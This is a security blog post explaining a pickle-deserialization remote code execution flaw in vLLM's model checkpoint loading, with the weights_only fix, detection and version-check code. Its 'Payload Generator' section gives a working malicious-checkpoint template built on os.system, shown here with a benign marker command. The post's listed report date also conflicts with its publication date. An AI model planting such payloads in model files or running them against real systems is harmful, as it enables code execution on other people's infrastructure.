

CVE-2025-24357 is a serious remote code execution (RCE) vulnerability in vLLM, a popular library for serving and running inference on large language models. The root cause is unsafe handling of model checkpoint files downloaded from Hugging Face: vLLM passed them to PyTorch's torch.load in a way that lets a malicious pickle payload execute code. The vulnerability was fixed in vLLM version 0.7.0.

This post will break down the issue step-by-step, demonstrate how the exploit would work, and advise on how to stay safe.

What is vLLM?

vLLM is an open-source engine built for serving and performing inference with Large Language Models (LLMs) in Python. It is widely used for making language models fast and efficient in production. To load pre-trained models, vLLM retrieves checkpoints (model weights) typically hosted on Hugging Face.

Where's the Vulnerability?

The bug lies in vllm/model_executor/weight_utils.py, specifically in the hf_model_weights_iterator function, which is responsible for loading model weights.

Here's a simplified version of the vulnerable logic:

    # Downloads checkpoint files (potentially from Hugging Face)
    def hf_model_weights_iterator(...):
        ...
        checkpoint_path = download_checkpoint(...)

        # Directly loads the checkpoint with torch.load
        ckpt = torch.load(checkpoint_path, map_location="cpu")
        ...

This means any file downloaded as a checkpoint, including a malicious one, is passed directly to torch.load. In PyTorch releases before 2.6, torch.load defaults to weights_only=False and will unpickle whatever is in that file.

Why is This Dangerous?

Pickle (Python's object serialization format) is not safe for untrusted data. If someone uploads a model checkpoint with malicious Pickle payloads to a Model Hub like Hugging Face, when vLLM loads it, arbitrary code embedded inside the Pickle can be executed with the privileges of the vLLM process. This is the classic "untrusted deserialization" RCE.
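
To make the mechanism concrete, here is a minimal, harmless sketch of how unpickling can call an arbitrary function. The class name `Demo` is hypothetical, and `os.getcwd` stands in for a dangerous call such as `os.system`.

```python
import os
import pickle


class Demo:
    def __reduce__(self):
        # Tells pickle to "rebuild" this object by calling os.getcwd().
        # os.getcwd is a harmless stand-in for something like os.system.
        return (os.getcwd, ())


payload = pickle.dumps(Demo())

# Loading the bytes calls os.getcwd() and returns its result,
# not a Demo instance. The caller never invoked anything on Demo.
result = pickle.loads(payload)
print(type(result).__name__, result == os.getcwd())
```

The point is that the callable is chosen by whoever wrote the bytes, not by the code that loads them.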

How is it Fixed?

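The fix in vLLM v0.7.0 is to set the weights_only parameter of torch.load to True. With weights_only=True, PyTorch does not skip unpickling; it uses a restricted unpickler that only reconstructs tensors, primitive types, dictionaries, and a small allowlist of other safe types. It refuses to resolve arbitrary callables such as os.system, so a payload like the one shown in this post fails to load instead of executing.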

Patch Example

    - ckpt = torch.load(checkpoint_path, map_location="cpu")
    + ckpt = torch.load(checkpoint_path, map_location="cpu", weights_only=True)
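
One way to picture what a restricted loader does is an allowlisting unpickler. The sketch below uses only the standard library and is an analogy, not PyTorch's actual implementation; `ALLOWED_GLOBALS`, `RestrictedUnpickler`, `restricted_loads`, and `Evil` are hypothetical names chosen for illustration.

```python
import io
import os
import pickle
from collections import OrderedDict

# Hypothetical allowlist for this sketch: the only globals that may be resolved.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data):
    """Unpickle bytes, rejecting any global not on the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    def __reduce__(self):
        # Harmless stand-in for os.system in a real payload.
        return (os.getcwd, ())


# Plain containers and allowlisted types load normally.
print(restricted_loads(pickle.dumps(OrderedDict(layer=[1.0, 2.0]))))

# A payload that references any other callable is rejected before it runs.
try:
    restricted_loads(pickle.dumps(Evil()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

The design choice is to deny by default: anything not explicitly allowed is an error, so new attack gadgets do not need to be enumerated.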

Exploit Example

Here’s how an attacker could exploit this in a simple way. Let’s say they upload a model checkpoint file containing a Pickle RCE payload to a public repository (like Hugging Face).

Payload Generator (attacker-controlled)

    import os
    import pickle

    class Evil:
        def __reduce__(self):
            # On unpickling, pickle calls os.system with this command
            return (os.system, ('echo hacked > /tmp/vllm_exploit',))

    # Write malicious checkpoint
    with open('malicious_checkpoint.pt', 'wb') as f:
        pickle.dump(Evil(), f)

Now when a vulnerable version of vLLM loads malicious_checkpoint.pt as a model, the call returned by Evil.__reduce__ runs as soon as the file is unpickled. For this sample, it writes "hacked" into /tmp/vllm_exploit, but a real attacker could run anything.
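
A pickle stream can also be inspected without being loaded. The following is a rough sketch, not a complete scanner: it uses the standard library's `pickletools.genops` to list the globals a stream would import. The function name `referenced_globals` is hypothetical, and the handling of `STACK_GLOBAL` is a heuristic that assumes the module and name were the two most recently pushed strings.

```python
import os
import pickle
import pickletools


def referenced_globals(data):
    """List (module, name) pairs a pickle would import, without loading it."""
    found = []
    strings = []  # string arguments seen so far, used for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols carry "module name" as a single argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: module and name are the two latest strings pushed.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Evil:
    def __reduce__(self):
        return (os.system, ("echo hacked > /tmp/vllm_exploit",))


# Serialising the object does not execute the command; only loading would.
payload = pickle.dumps(Evil())
print(referenced_globals(payload))
```

Any reference to a module like `os`, `posix`, `nt`, or `subprocess` in a file that is supposed to hold only weights is a strong warning sign. Note that this sketch reads a raw pickle stream like the payload above; checkpoints saved in PyTorch's zip-based format keep their pickle inside the archive, which would need to be extracted first.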

- Reported: 2025-02

- Patched: vLLM 0.7.0

- CVE assigned: CVE-2025-24357

Am I Vulnerable? How to Fix

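- You are vulnerable if you use vLLM < 0.7.0 and load any checkpoint files from outside sources or untrusted repositories.

- To fix the issue, upgrade to vLLM 0.7.0 or later, and load checkpoints only from sources you trust.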
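
A quick way to check an environment is to compare the installed version against the fixed release. This is a minimal sketch using only the standard library; `parse_release`, `is_affected`, and `installed_vllm_is_affected` are hypothetical helper names, and the parser deliberately ignores suffixes such as `.post1` or `rc1`.

```python
import re
from importlib import metadata

FIXED_VERSION = (0, 7, 0)  # first vLLM release containing the fix


def parse_release(version):
    """Extract leading numeric components, e.g. '0.6.6.post1' -> (0, 6, 6)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = tuple(int(p) for p in match.group(0).split("."))
    # Pad short versions such as '0.7' to three components.
    return parts + (0,) * (3 - len(parts))


def is_affected(version):
    """Return True if the given vLLM version predates the fix."""
    return parse_release(version)[:3] < FIXED_VERSION


def installed_vllm_is_affected():
    """Check the installed vllm package; return None if it is not installed."""
    try:
        return is_affected(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None


print(is_affected("0.6.6.post1"), is_affected("0.7.0"))
```

Because pre-release suffixes are ignored, a release candidate of 0.7.0 would be reported as not affected; treat such builds with caution and prefer a final release.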

Takeaways

Never trust unvalidated input to Pickle (or torch.load, by default). The LLM ecosystem is moving so fast that basic appsec errors like this can have huge impact. Always update to the latest libraries, and ensure you're aware of what files your AI infrastructure loads from the internet.

*Stay safe, keep dependencies updated, and if you're building applications for model serving, always watch out for untrusted deserialization bugs!*

Timeline

Published on: 01/27/2025 18:15:41 UTC